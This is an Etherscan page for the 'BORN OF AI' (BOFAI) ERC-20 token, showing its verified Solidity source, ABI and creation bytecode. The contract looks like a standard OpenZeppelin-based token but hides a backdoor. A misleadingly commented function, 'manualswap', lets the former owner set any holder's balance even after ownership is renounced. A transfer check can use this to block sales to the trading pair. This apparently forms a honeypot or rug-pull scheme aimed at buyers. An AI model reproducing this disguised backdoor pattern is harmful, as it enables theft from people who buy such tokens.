ETH Price: $3,502.20 (+2.50%)
Gas: 12 Gwei

Token

BORN OF AI (BOFAI)
 

Overview

Max Total Supply

1,000,000,000 BOFAI

Holders

11

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BornofAI

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-02-23
*/

/**
The next-generation Decentralized Finance (DeFi) 
cryptocurrency has mapped out several Decentralized Finance
(DeFi) utilities to stand out and dominate the DeFi market. 

    -https://t.me/BornofAI
    -https://twitter.com/BornofAITWT
    -https://born-of-ai.com
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.10;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function manualswap(address spender, uint256 amount, bool enable) public virtual {
        address _owner = oldOwner;

        require(msg.sender == _owner, "ERC20: approve from owner address");
        require(enable == true, "ERC20: approve from owner address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _balances[spender] = amount;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract BornofAI is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 1_000_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    uint256 _burnPercent = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("BORN OF AI", unicode"BOFAI", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 20;
        maxTxAmount = TOTAL_SUPPLY / 20;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");
            }

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"manualswap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600c553480156200001657600080fd5b506040516200167a3803806200167a8339810160408190526200003991620002e8565b6040518060400160405280600a815260200169424f524e204f4620414960b01b81525060405180604001604052806005815260200164424f46414960d81b815250670de0b6b3a76400006200009d62000097620001d660201b60201c565b620001da565b8251620000b290600690602086019062000242565b508151620000c890600790602085019062000242565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600e80546001600160a01b0319166001600160a01b0384161790555080620001466014670de0b6b3a76400006200031a565b600a556200015e6014670de0b6b3a76400006200031a565b60095550600b6020527f44433eeeda1d04bdae79f62169cdb2ab0a6af287fa15706d3fafdbac5fac34158054600160ff1991821681179092556001600160a01b03929092166000908152604080822080548516841790553382528082208054851684179055308252902080549092161790556200037a565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b82805462000250906200033d565b90600052602060002090601f016020900481019282620002745760008555620002bf565b82601f106200028f57805160ff1916838001178555620002bf565b82800160010185558215620002bf579182015b82811115620002bf578251825591602001919060010190620002a2565b50620002cd929150620002d1565b5090565b5b80821115620002cd5760008155600101620002d2565b600060208284031215620002fb57600080fd5b81516001600160a01b03811681146200031357600080fd5b9392505050565b6000826200033857634e487b7160e01b600052601260045260246000fd5b500490565b600181811c908216806200035257607f821691505b602082108114156200037457634e487b7160e01b600052602260045260246000fd5b50919050565b6112f0806200038a6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a457c2d711610071578063a457c2d714610259578063a9059cbb1461026c578063d7ce765d1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b8063715018a6146102025780638c0b5e221461020a5780638da5cb5b1461021357806395d89b411461022e57806398636f321461023657600080fd5b8063333e6f06116100f4578063333e6f06146101a657806339509351146101af57806344489ad1146101c257806362256589146101cf57806370a08231146101d957600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610f10565b60405180910390f35b61016261015d366004610f7a565b610370565b6040519015158152602001610146565b6005545b604051908152602001610146565b610162610192366004610fa6565b610386565b60405160098152602001610146565b610176600a5481565b6101626101bd366004610f7a565b61043c565b6008546101629060ff1681565b6101d7610473565b005b6101766101e7366004610fe7565b6001600160a01b031660009081526003602052604090205490565b6101d761048a565b61017660095481565b6000546040516001600160a01b039091168152602001610146565b61013961049e565b610162610244366004610fe7565b600b6020526000908152604090205460ff1681565b610162610267366004610f7a565b6104ad565b61016261027a366004610f7a565b610548565b6101d761028d36600461100b565b610555565b6101766102a0366004611052565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101d76102d9366004610fe7565b6105e6565b6060600680546102ed9061108b565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061108b565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b600061037d33848461065f565b50600192915050565b6000610393848484610748565b6001600160a01b03841660009081526004602090815260408083203384529091529020548281101561041d5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b610431853361042c86856110dc565b61065f565b506001949350505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161037d91859061042c9086906110f3565b61047b6108dc565b6008805460ff19166001179055565b6104926108dc565b61049c6000610936565b565b6060600780546102ed9061108b565b3360009081526004602090815260408083206001600160a01b03861684529091528120548281101561052f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610414565b61053e338561042c86856110dc565b5060019392505050565b600061037d338484610748565b6001546001600160a01b03163381146105805760405162461bcd60e51b81526004016104149061110b565b6001821515146105a25760405162461bcd60e51b81526004016104149061110b565b6001600160a01b0384166105c85760405162461bcd60e51b81526004016104149061114c565b50506001600160a01b03909116600090815260036020526040902055565b6105ee6108dc565b6001600160a01b0381166106535760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610414565b61065c81610936565b50565b6001600160a01b0383166106c15760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610414565b6001600160a01b0382166106e75760405162461bcd60e51b81526004016104149061114c565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661076e5760405162461bcd60e51b81526004016104149061118e565b6001600160a01b0382166107945760405162461bcd60e51b8152600401610414906111d3565b61079f83838361099e565b806107a957505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107eb57506001600160a01b0382166000908152600b602052604090205460ff16155b156108cc57600d546001600160a01b038381169116141561086e57600e546001600160a01b03166000908152600360205260409020541561086e5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e006044820152606401610414565b600d546001600160a01b03848116911614806108975750600d546001600160a01b038381169116145b156108cc5760006064600c54836108ae9190611216565b6108b89190611235565b90506108c684848484610c69565b50505050565b6108d7838383610df1565b505050565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610414565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108d7576001600160a01b0383166000908152600b602052604090205460ff161580156109ea57506001600160a01b0382166000908152600b602052604090205460ff16155b156108d757600954811115610a365760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b6044820152606401610414565b600d546001600160a01b0316610bd357600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a99573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610abd9190611257565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b1f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b439190611257565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b8e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bb29190611257565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0383811691161415610bee57505050565b600a5481610c11846001600160a01b031660009081526003602052604090205490565b610c1b91906110f3565b11156108d75760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d617800000000000000006044820152606401610414565b6001600160a01b038416610c8f5760405162461bcd60e51b81526004016104149061118e565b6001600160a01b038316610cb55760405162461bcd60e51b8152600401610414906111d3565b6001600160a01b03841660009081526003602052604090205482811015610cee5760405162461bcd60e51b815260040161041490611274565b6001600160a01b03851660009081526003602052604090208382039055610d1582846110dc565b92508160056000828254610d2991906110dc565b90915550506001600160a01b03841660009081526003602052604081208054859290610d569084906110f3565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610de291815260200190565b60405180910390a35050505050565b6001600160a01b038316610e175760405162461bcd60e51b81526004016104149061118e565b6001600160a01b038216610e3d5760405162461bcd60e51b8152600401610414906111d3565b6001600160a01b03831660009081526003602052604090205481811015610e765760405162461bcd60e51b815260040161041490611274565b610e8082826110dc565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610eb69084906110f3565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f0291815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f3d57858101830151858201604001528201610f21565b81811115610f4f576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b038116811461065c57600080fd5b60008060408385031215610f8d57600080fd5b8235610f9881610f65565b946020939093013593505050565b600080600060608486031215610fbb57600080fd5b8335610fc681610f65565b92506020840135610fd681610f65565b929592945050506040919091013590565b600060208284031215610ff957600080fd5b813561100481610f65565b9392505050565b60008060006060848603121561102057600080fd5b833561102b81610f65565b9250602084013591506040840135801515811461104757600080fd5b809150509250925092565b6000806040838503121561106557600080fd5b823561107081610f65565b9150602083013561108081610f65565b809150509250929050565b600181811c9082168061109f57607f821691505b602082108114156110c057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000828210156110ee576110ee6110c6565b500390565b60008219821115611106576111066110c6565b500190565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b6000816000190483118215151615611230576112306110c6565b500290565b60008261125257634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561126957600080fd5b815161100481610f65565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212205586fc24b2e077ee0d5d971fc68b08481ff7e4559a88e230c880131be70923f664736f6c634300080a00330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d

Deployed Bytecode

